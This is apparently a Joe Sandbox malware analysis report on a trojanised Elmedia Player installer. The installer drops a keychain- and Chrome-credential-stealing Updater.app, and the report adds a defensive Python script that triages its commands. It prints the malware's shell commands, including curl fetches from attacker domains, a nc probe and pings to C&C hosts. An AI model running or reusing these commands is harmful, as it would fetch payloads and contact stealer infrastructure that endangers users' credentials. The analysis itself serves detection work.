
Analysis Report

Overview

General Information

Joe Sandbox Version: 21.0.0
Analysis ID: 44833
Start time: 15:07:04
Joe Sandbox Product: Cloud
Start date: 23.10.2017
Overall analysis duration: 0h 14m 55s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: eY60uYkZgM (renamed file extension from none to dmg)
Cookbook file name: defaultmacfilecookbook.jbs
Analysis system description: Mac Mini, El Capitan 10.11.6 (MS Office 15.25, Java 1.8.0_131)
Detection: MAL
Classification: mal72.troj.spyw.evad.macDMG@0/37@23/0


Detection

Strategy: Threshold
Score: 72
Range: 0 - 100
Reporting: Report FP / FN
Detection: malicious


Classification

Signature Overview



Cryptography:

Creates files with functionality related to DES encryption and/or decryption
Source: /private/tmp/Updater.app/Contents/Resources/pyDes.py | Found S1 S-Box: [14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7, 0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8, 4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0, 15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13]
Executes the "openssl" command used for cryptographic operations
Source: /bin/sh (PID: 528) | Openssl executable: /usr/bin/openssl -> openssl rsautl -verify -in /tmp/Updater.app/Contents/Resources/.checksum -pubin -inkey /tmp/public.pem
Writes files containing public keys to disk
Source: /usr/bin/unzip (PID: 524) | File created matching 'PUBLIC KEY' pattern: /private/tmp/Updater.app/Contents/MacOS/Updater
Source: /bin/sh (PID: 527) | File created matching 'PUBLIC KEY' pattern: /private/tmp/public.pem

Networking:

Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: appstatico.eltima.com
Reads from file descriptors related to (network) sockets
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522) | Reads from socket in process: data
Source: /usr/bin/curl (PID: 533) | Reads from socket in process: data
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 49218 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49219 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49220 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49221
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49220
Source: unknown | Network traffic detected: HTTP traffic on port 49221 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49219
Source: unknown | Network traffic detected: HTTP traffic on port 49217 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49218
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49217
Writes to file descriptors related to (network) sockets
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522) | Writes to socket in process: data
Source: /usr/bin/curl (PID: 533) | Writes to socket in process: data
Source: /usr/bin/curl (PID: 539) | Writes to socket in process: data
Detected non-DNS traffic on DNS port
Source: global traffic | TCP traffic: 192.168.0.50:49216 -> 8.8.8.8:53
Executes the "nc" (netcat) command used to establish arbitrary TCP or UDP connections and listeners
Source: /bin/sh (PID: 530) | Netcat executable: /usr/bin/nc -> nc -G 20 -z 8.8.8.8 53
Pings several hosts (probably to check C&C connectivity)
Source: Ping host arguments | More than 5 different servers pinged: ypu4vwlenakpt29f95etrqllq.com, eltimastore.cc, aslkdwilkaleopaela.com, fyamakgtaajt9vrwhmc76v38.com, eltima.in, ksldewioweiqiedklsakdnkld.com, dakadaoqoqimmsdssksjdsk.com, qweiqqwkwqehiqejkehiohqehqewq.com, qrbdcwwwe9pxmqsadjaksioie9.com, kcdjzquvhsuka6hlfbmjzkzsb.com, eltimastore.in

System Summary:

Classification label
Source: classification engine | Classification label: mal72.troj.spyw.evad.macDMG@0/37@23/0

Data Obfuscation:

Imports the IOKit library (often used to register services)
Source: initial sample | Static MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
Imports the Security library (often used for certificate, key, keychain, or secure transport handling)
Source: initial sample | Static MACH information: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security

Persistence and Installation Behavior:

Creates application bundles containing icon files
Source: /usr/bin/unzip (PID: 524) | Icon file created: /tmp/Updater.app/Contents/Resources/Finder.icns
Source: /usr/bin/unzip (PID: 524) | Icon file created: /tmp/Updater.app/Contents/Resources/t.icns
Reads data from the local random number generator
Source: /usr/bin/open (PID: 521) | Random device file read: /dev/random
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522) | Random device file read: /dev/random
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522) | Random device file read: /dev/random
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526) | Random device file read: /dev/random
Source: /usr/bin/openssl (PID: 528) | Random device file read: /dev/urandom
Source: /usr/bin/curl (PID: 533) | Random device file read: /dev/random
Source: /usr/bin/curl (PID: 533) | Random device file read: /dev/random
Source: /usr/bin/curl (PID: 539) | Random device file read: /dev/random
Source: /usr/bin/curl (PID: 539) | Random device file read: /dev/random
Uses AppleKeyboardLayouts bundle containing keyboard layouts
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 519) | AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522) | AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526) | AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Writes property list (.plist) files to disk
Source: /usr/bin/unzip (PID: 524) | XML plist file created: /private/tmp/Updater.app/Contents/Info.plist
Source: /usr/bin/unzip (PID: 524) | Binary plist file created: /private/tmp/Updater.app/Contents/Resources/MainMenu.nib
Changes permissions of written Mach-O files
Source: /usr/bin/unzip (PID: 524) | Permissions modified for written 64-bit Mach-O /private/tmp/Updater.app/Contents/MacOS/Updater: bits: - usr: rx grp: rx all: rwx
Checks the current date and time via the Internet using a shell command
Source: /bin/sh (PID: 533) | HTTP request via command: /usr/bin/curl -> curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec
Creates Python files with suspicious function names
Source: /private/tmp/Updater.app/Contents/Resources/cb.py | Suspicious function name: def checkValidKeychain(self):
Source: /private/tmp/Updater.app/Contents/Resources/cb.py | Suspicious function name: def getKeyblobRecord(self, base_addr, offset):
Source: /private/tmp/Updater.app/Contents/Resources/cb.py | Suspicious function name: def getEncryptedDatainBlob(self, BlobBuf):
Source: /private/tmp/Updater.app/Contents/Resources/cb.py | Suspicious function name: def getKeychainTime(self, BASE_ADDR, pCol):
Source: /private/tmp/Updater.app/Contents/Resources/cb.py | Suspicious function name: def DBBlobDecryption(self, securestoragegroup, dbkey):
Source: /private/tmp/Updater.app/Contents/Resources/cb.py | Suspicious function name: def KeyblobDecryption(self, encryptedblob, iv, dbkey):
Source: /private/tmp/Updater.app/Contents/Resources/cb.py | Suspicious function name: def KeyblobDecryption(self, encryptedblob, iv, dbkey):
Source: /private/tmp/Updater.app/Contents/Resources/cb.py | Suspicious function name: def generateMasterKey(self, pw, symmetrickey_offset):
Source: /private/tmp/Updater.app/Contents/Resources/cb.py | Suspicious function name: def findWrappingKey(self, master, symmetrickey_offset):
Source: /private/tmp/Updater.app/Contents/Resources/cb.py | Suspicious function name: def kcdecrypt(key, iv, data):
Source: /private/tmp/Updater.app/Contents/Resources/ch.py | Suspicious function name: def chrome_decrypt(encrypted, iv, key):
Source: /private/tmp/Updater.app/Contents/Resources/pbkdf2.py | Suspicious function name: def xorstr(a, b):
Source: /private/tmp/Updater.app/Contents/Resources/pyDes.py | Suspicious function name: def encrypt(self, data, pad=''):
Source: /private/tmp/Updater.app/Contents/Resources/pyDes.py | Suspicious function name: def decrypt(self, data, pad=''):
Source: /private/tmp/Updater.app/Contents/Resources/pyDes.py | Suspicious function name: def xorstr(self, x, y):
Source: /private/tmp/Updater.app/Contents/Resources/pyDes.py | Suspicious function name: def encrypt(self, data, pad=''):
Source: /private/tmp/Updater.app/Contents/Resources/pyDes.py | Suspicious function name: def decrypt(self, data, pad=''):
Creates application bundles
Source: /usr/bin/unzip (PID: 524) | Bundle Info.plist file created: /tmp/Updater.app/Contents/Info.plist
Creates hidden files, links and/or directories
Source: /usr/bin/unzip (PID: 524) | Hidden file created: /tmp/Updater.app/Contents/Resources/.checksum
Source: /usr/bin/unzip (PID: 524) | Hidden file created: /tmp/Updater.app/Contents/Resources/.crc32
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522) | Hidden file created: /Users/vreni/Library/Preferences/.dat.nosync020a.p7191h
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522) | Hidden file created: /Users/vreni/Library/Preferences/.dat.nosync020a.CUKIia
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522) | Hidden file created: /Users/vreni/Library/Preferences/.dat.nosync020a.AE4NNA
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522) | Hidden file created: /Users/vreni/Library/Preferences/.dat.nosync020a.dYwjXv
Executes commands using a shell command-line interpreter
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 519) | Shell command executed: /bin/sh -c open '/Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app'
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 519) | Shell command executed: /bin/sh -c unzip -d /tmp /Users/vreni/Desktop/unpack/Elmedia\ Player/Elmedia\ Player.app/Contents/Resources/.pl.zip && open /tmp/Updater.app
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526) | Shell command executed: /bin/sh -c echo '-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvceoh2bLtCGhgMM6SHvse8qFPKI4yX/RLAfKSvccClFnV7WQqlqVEZ/xL9/wQ6uSbwEUxwweq9lu8CMSucKR881zSFHBoj2epoHFbJoJmI3Cn8GHLZs+JbDss/kxrtNDTBYXAC6jL0xwPj4zj2LdvuSLvkh25egGmc/M3IXEjBtjSBvjEjWF5/QD0oDfKXs/j6OvurrjSReqxwZFKcOc5RH2hTRj2wu/Kuz7yVFeRrpCusjuVteq8ePFT7UF7QnXgfGvsxMsv3cItmoEJYkz1xcVyfknIlIaqsJrDT0zjn61Vsj9ywB8WeK2g9BSublBZ7PN5jHXdZWudgtrExHvUwIDAQAB-----END PUBLIC KEY-----' > /tmp/public.pem openssl rsautl -verify -in /tmp/Updater.app/Contents/Resources/.checksum -pubin -inkey /tmp/public.pem
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526) | Shell command executed: /bin/sh -c nc -G 20 -z 8.8.8.8 53 >/dev/null 2>&1 && echo success
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526) | Shell command executed: /bin/sh -c hcresult=`curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec` && echo $hcresult
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526) | Shell command executed: /bin/sh -c a90=`curl -s --connect-timeout 10 -o /tmp/au https://eltima.in/rsa` && echo && echo '-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6BmQXbeRPZ3z+GZCo4I01xmx96ODUQ885MqCEazpcaGcbmctYvTd/RINnQFLjKh7leSXgA8gZg77CZldsjYtt0v8cvv7SYqbZiwGy1e2kYtz0sEtBEdbiGxSNNWw+TXlGQ+SV5WTJuK36HBWW/wfOY9dbsJnz7vv8nhh26Vpa8Krd1gfIFT3D/Vz9eB4vtGXBBZNU3+jP6VvdXna5NgC1zZW5DpKWXCSf3KjZwwH+Vy9WgnGeTpUPMeUJKTngNVA5BzJj65NgcRq5KmnQZsNanKn6NjL3l/h2QrZfvpCSDWWEJ05FhKnAbPshF+VEe+bBJnPnOOndTFsbWZDyYOgdQIDAQAB-----END PUBLIC KEY-----' > /tmp/au.pub && echo success
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526) | Shell command executed: /bin/sh -c ping -c 1 eltima.in 2>/dev/null >/dev/null && echo 0
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526) | Shell command executed: /bin/sh -c ping -c 1 eltimastore.in 2>/dev/null >/dev/null && echo 0
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526) | Shell command executed: /bin/sh -c ping -c 1 eltimastore.cc 2>/dev/null >/dev/null && echo 0
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526) | Shell command executed: /bin/sh -c ping -c 1 aslkdwilkaleopaela.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526) | Shell command executed: /bin/sh -c ping -c 1 ksldewioweiqiedklsakdnkld.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526) | Shell command executed: /bin/sh -c ping -c 1 dakadaoqoqimmsdssksjdsk.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526) | Shell command executed: /bin/sh -c ping -c 1 qweiqqwkwqehiqejkehiohqehqewq.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526) | Shell command executed: /bin/sh -c ping -c 1 qrbdcwwwe9pxmqsadjaksioie9.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526) | Shell command executed: /bin/sh -c ping -c 1 fyamakgtaajt9vrwhmc76v38.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526) | Shell command executed: /bin/sh -c ping -c 1 kcdjzquvhsuka6hlfbmjzkzsb.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526) | Shell command executed: /bin/sh -c ping -c 1 ypu4vwlenakpt29f95etrqllq.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526) | Shell command executed: /bin/sh -c if [ -f /Library/.cache/.ptrun ] then echo success fi
Executes the "curl" command used to transfer data via the network (usually using HTTP/S)
Source: /bin/sh (PID: 533) | Curl executable: /usr/bin/curl -> curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec
Source: /bin/sh (PID: 539) | Curl executable: /usr/bin/curl -> curl -s --connect-timeout 10 -o /tmp/au https://eltima.in/rsa
Executes the "ping" command used for connectivity testing via ICMP
Source: /bin/sh (PID: 541) | Ping executable: /sbin/ping -> ping -c 1 eltima.in
Source: /bin/sh (PID: 543) | Ping executable: /sbin/ping -> ping -c 1 eltimastore.in
Source: /bin/sh (PID: 545) | Ping executable: /sbin/ping -> ping -c 1 eltimastore.cc
Source: /bin/sh (PID: 547) | Ping executable: /sbin/ping -> ping -c 1 aslkdwilkaleopaela.com
Source: /bin/sh (PID: 549) | Ping executable: /sbin/ping -> ping -c 1 ksldewioweiqiedklsakdnkld.com
Source: /bin/sh (PID: 551) | Ping executable: /sbin/ping -> ping -c 1 dakadaoqoqimmsdssksjdsk.com
Source: /bin/sh (PID: 553) | Ping executable: /sbin/ping -> ping -c 1 qweiqqwkwqehiqejkehiohqehqewq.com
Source: /bin/sh (PID: 555) | Ping executable: /sbin/ping -> ping -c 1 qrbdcwwwe9pxmqsadjaksioie9.com
Source: /bin/sh (PID: 557) | Ping executable: /sbin/ping -> ping -c 1 fyamakgtaajt9vrwhmc76v38.com
Source: /bin/sh (PID: 559) | Ping executable: /sbin/ping -> ping -c 1 kcdjzquvhsuka6hlfbmjzkzsb.com
Source: /bin/sh (PID: 562) | Ping executable: /sbin/ping -> ping -c 1 ypu4vwlenakpt29f95etrqllq.com
Opens applications that may have been created by the sample
Source: /bin/sh (PID: 521) | Application opened: open /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app
Source: /bin/sh (PID: 525) | Application opened: open /tmp/Updater.app
Reads launchservices plist files
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 519) | Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices.plist
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 519) | Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522) | Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices.plist
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522) | Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526) | Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices.plist
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526) | Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Reads user launchservices plist file containing default apps for corresponding filetypes
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 519) | Preferences launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522) | Preferences launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526) | Preferences launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Uses CFNetwork bundle containing interfaces for network communication (HTTP, sockets, and Bonjour)
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522) | CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plist
Writes 64-bit Mach-O files to disk
Source: /usr/bin/unzip (PID: 524) | File written: /private/tmp/Updater.app/Contents/MacOS/Updater
Writes Mach-O files to the tmp directory
Source: /usr/bin/unzip (PID: 524) | 64-bit Mach-O written to tmp path: /private/tmp/Updater.app/Contents/MacOS/Updater
Writes Python files to disk
Source: /usr/bin/unzip (PID: 524) | Python file created: /private/tmp/Updater.app/Contents/Resources/cb.py
Source: /usr/bin/unzip (PID: 524) | Python file created: /private/tmp/Updater.app/Contents/Resources/ch.py
Source: /usr/bin/unzip (PID: 524) | Python file created: /private/tmp/Updater.app/Contents/Resources/pbkdf2.py
Source: /usr/bin/unzip (PID: 524) | Python file created: /private/tmp/Updater.app/Contents/Resources/pyDes.py
Source: /usr/bin/unzip (PID: 524) | Python file created: /private/tmp/Updater.app/Contents/Resources/Schema.py
Writes icon files to disk
Source: /usr/bin/unzip (PID: 524) | File written: /private/tmp/Updater.app/Contents/Resources/Finder.icns
Source: /usr/bin/unzip (PID: 524) | File written: /private/tmp/Updater.app/Contents/Resources/t.icns
Many shell processes execute programs via the execve syscall (may be indicative of malicious behaviour)
Source: /bin/sh (PID: 521) | Shell process: open /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app
Source: /bin/sh (PID: 524) | Shell process: unzip -d /tmp /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/.pl.zip
Source: /bin/sh (PID: 525) | Shell process: open /tmp/Updater.app
Source: /bin/sh (PID: 528) | Shell process: openssl rsautl -verify -in /tmp/Updater.app/Contents/Resources/.checksum -pubin -inkey /tmp/public.pem
Source: /bin/sh (PID: 530) | Shell process: nc -G 20 -z 8.8.8.8 53
Source: /bin/sh (PID: 533) | Shell process: curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec
Source: /bin/sh (PID: 539) | Shell process: curl -s --connect-timeout 10 -o /tmp/au https://eltima.in/rsa
Source: /bin/sh (PID: 541) | Shell process: ping -c 1 eltima.in
Source: /bin/sh (PID: 543) | Shell process: ping -c 1 eltimastore.in
Source: /bin/sh (PID: 545) | Shell process: ping -c 1 eltimastore.cc
Source: /bin/sh (PID: 547) | Shell process: ping -c 1 aslkdwilkaleopaela.com
Source: /bin/sh (PID: 549) | Shell process: ping -c 1 ksldewioweiqiedklsakdnkld.com
Source: /bin/sh (PID: 551) | Shell process: ping -c 1 dakadaoqoqimmsdssksjdsk.com
Source: /bin/sh (PID: 553) | Shell process: ping -c 1 qweiqqwkwqehiqejkehiohqehqewq.com
Source: /bin/sh (PID: 555) | Shell process: ping -c 1 qrbdcwwwe9pxmqsadjaksioie9.com
Source: /bin/sh (PID: 557) | Shell process: ping -c 1 fyamakgtaajt9vrwhmc76v38.com
Source: /bin/sh (PID: 559) | Shell process: ping -c 1 kcdjzquvhsuka6hlfbmjzkzsb.com
Source: /bin/sh (PID: 562) | Shell process: ping -c 1 ypu4vwlenakpt29f95etrqllq.com
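The shell commands recorded above lay out the whole staging chain in order: the outer Elmedia Player binary unzips the hidden .pl.zip into /tmp and opens the dropped Updater.app; the updater verifies .checksum against an RSA public key it writes to /tmp/public.pem, probes outbound TCP/53 to 8.8.8.8 with nc, calls a Google Apps Script URL, fetches https://eltima.in/rsa, pings a list of candidate C&C domains one at a time, and finally tests for a hidden marker file under /Library/.cache. The Python script below is an added example, not code from this report, from Joe Sandbox or from the sample: it takes a list of such "/bin/sh -c" payloads, tags each one with a kill-chain stage, extracts indicators (domains, URLs, paths written, hidden paths tested, the nc target) and flags domain labels that look machine-generated. The stage names, the regular expressions and the generated-domain heuristic are the example's own assumptions, and its input is a constructed subset of the commands listed above with the long public keys shortened.

```python
"""Triage of sandbox-recorded shell commands (added example; stage names,
patterns and the generated-domain heuristic are this example's own)."""
import re

# Constructed sample: a subset of the report's "/bin/sh -c" payloads. The
# embedded RSA keys are shortened and the two commands the report shows run
# together on one line are separated here with ';'.
SAMPLE_COMMANDS = [
    "open '/Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app'",
    "unzip -d /tmp /Users/vreni/Desktop/unpack/Elmedia\\ Player/Elmedia\\ Player.app/Contents/Resources/.pl.zip && open /tmp/Updater.app",
    "echo '-----BEGIN PUBLIC KEY-----MIIB...-----END PUBLIC KEY-----' > /tmp/public.pem; openssl rsautl -verify -in /tmp/Updater.app/Contents/Resources/.checksum -pubin -inkey /tmp/public.pem",
    "nc -G 20 -z 8.8.8.8 53 >/dev/null 2>&1 && echo success",
    "hcresult=`curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec` && echo $hcresult",
    "a90=`curl -s --connect-timeout 10 -o /tmp/au https://eltima.in/rsa` && echo '-----BEGIN PUBLIC KEY-----MIIB...-----END PUBLIC KEY-----' > /tmp/au.pub && echo success",
    "ping -c 1 eltima.in 2>/dev/null >/dev/null && echo 0",
    "ping -c 1 aslkdwilkaleopaela.com 2>/dev/null >/dev/null && echo 0",
    "ping -c 1 ypu4vwlenakpt29f95etrqllq.com 2>/dev/null >/dev/null && echo 0",
    "if [ -f /Library/.cache/.ptrun ] then echo success fi",
]

# A path character is anything but whitespace, quotes and shell operators;
# a backslash-escaped space is allowed so 'Elmedia\ Player' stays one path.
PATH_CHAR = r'''(?:\\ |[^\s'"`&;])'''
URL_RE = re.compile(r'''https?://[^\s'"`]+''')
PING_RE = re.compile(r"\bping\s+-c\s+\d+\s+([A-Za-z0-9.-]+)")
NC_RE = re.compile(r"\bnc\b[^&|;]*?\s(\d{1,3}(?:\.\d{1,3}){3})\s+(\d+)\b")
WRITE_RE = re.compile(r"(?:>|\s-o|\s-d)\s*(/" + PATH_CHAR + "+)")   # redirect, curl -o, unzip -d
HIDDEN_RE = re.compile("/" + PATH_CHAR + r"*/\.[A-Za-z]" + PATH_CHAR + "*")  # dot-file component

# Most specific pattern first, so "curl -o" is a download before it is a beacon.
STAGE_RULES = [
    ("signature_check", re.compile(r"\bopenssl\s+rsautl\s+-verify\b")),
    ("connectivity_check", re.compile(r"\bnc\b[^&|;]*\s-z\s")),
    ("c2_sweep", re.compile(r"\bping\s+-c\s+\d+\s+\S+")),
    ("marker_check", re.compile(r"\[\s*-f\s+\S*/\.\S+")),
    ("download", re.compile(r"\bcurl\b[^&|;`]*\s-o\s+\S+")),
    ("beacon", re.compile(r"\bcurl\b")),
    ("staging", re.compile(r"\bunzip\b[^&|;]*\s-d\s+/tmp\b")),
    ("launch", re.compile(r"^\s*open\s")),
]


def classify(command):
    """Return the first stage whose pattern matches the command, else 'other'."""
    for stage, pattern in STAGE_RULES:
        if pattern.search(command):
            return stage
    return "other"


def looks_generated(domain):
    """Heuristic (an assumption of this example): a registrable label of 16+
    characters that contains digits, has fewer than one vowel in three, or
    has a run of four or more consonants is treated as generated or mashed."""
    label = domain.split(".")[0].lower()
    if len(label) < 16:
        return False
    if any(ch.isdigit() for ch in label):
        return True
    if sum(ch in "aeiou" for ch in label) / len(label) < 0.34:
        return True
    return re.search(r"[^aeiou0-9]{4,}", label) is not None


def extract_iocs(commands):
    """Collect network and file-system indicators from a list of commands."""
    iocs = {"domains": set(), "urls": set(), "connectivity_targets": set(),
            "written_paths": set(), "hidden_paths": set()}
    for cmd in commands:
        for url in URL_RE.findall(cmd):
            iocs["urls"].add(url)
            iocs["domains"].add(url.split("/")[2])
        iocs["domains"].update(PING_RE.findall(cmd))
        for ip, port in NC_RE.findall(cmd):
            iocs["connectivity_targets"].add("%s:%s/tcp" % (ip, port))
        for path in WRITE_RE.findall(cmd):
            if path != "/dev/null":          # redirections to /dev/null are noise
                iocs["written_paths"].add(path)
        iocs["hidden_paths"].update(HIDDEN_RE.findall(cmd))
    return iocs


def triage(commands):
    """Stages in execution order, indicators, and generated-looking domains."""
    iocs = extract_iocs(commands)
    return {
        "stages": [classify(c) for c in commands],
        "iocs": iocs,
        "generated_domains": sorted(d for d in iocs["domains"] if looks_generated(d)),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_COMMANDS)
    for stage, cmd in zip(result["stages"], SAMPLE_COMMANDS):
        print("%-19s %s" % (stage, cmd[:70]))
    for key, values in sorted(result["iocs"].items()):
        print(key, sorted(values))
    print("generated_domains", result["generated_domains"])
```

On the report's full command list the same script yields the stage sequence launch, staging, signature_check, connectivity_check, beacon, download, eleven c2_sweep entries and a marker_check, which is the shape a detection rule for this dropper should key on: a bundle nested inside another bundle's Resources spawning unzip into /tmp, followed within seconds by nc, curl and a burst of single-packet pings from the same parent. The domain heuristic deliberately does not flag eltima.in or eltimastore.cc; those are look-alikes of the vendor's real domain and have to come from a blocklist, not from entropy.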

Hooking and other Techniques for Hiding and Protection:

Denies being traced/debugged (via ptrace PT_DENY_ATTACH)
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526) | PTRACE system call (PT_DENY_ATTACH): PID 526 denies future traces

HIPS / PFW / Operating System Protection Evasion:

Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522) | Sysctl read request: kern.safeboot (1.66)
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526) | Sysctl read request: kern.safeboot (1.66)

Language, Device and Operating System Detection:

Reads the system or server version plist file
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 519) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/open (PID: 521) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/open (PID: 525) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
